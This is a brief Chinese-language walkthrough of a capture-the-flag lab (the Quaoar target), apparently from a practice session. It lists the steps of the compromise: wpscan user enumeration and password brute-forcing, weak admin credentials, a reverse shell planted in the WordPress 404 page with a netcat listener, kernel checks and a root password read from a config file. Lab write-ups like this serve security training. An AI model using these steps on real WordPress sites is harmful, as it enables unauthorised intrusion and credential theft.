靶机环境VirtualBox,桥接模式
主机发现
端口扫描
查看robots文件
用户名枚举
root@kali:/# wpscan --url http://192.168.0.122/wordpress --enumerate u
暴力破解
wpscan --url [wordpress网址] -P [字典文件] -U [要破解的用户]
Username: admin, Password: admin
404页面插入反弹shell
root@kali:~# nc -lvvp 1234
查看内核信息
www-data@Quaoar:/home/wpadmin$ cat /proc/version
读取配置文件
root用户密码:rootpassword!
另一个flag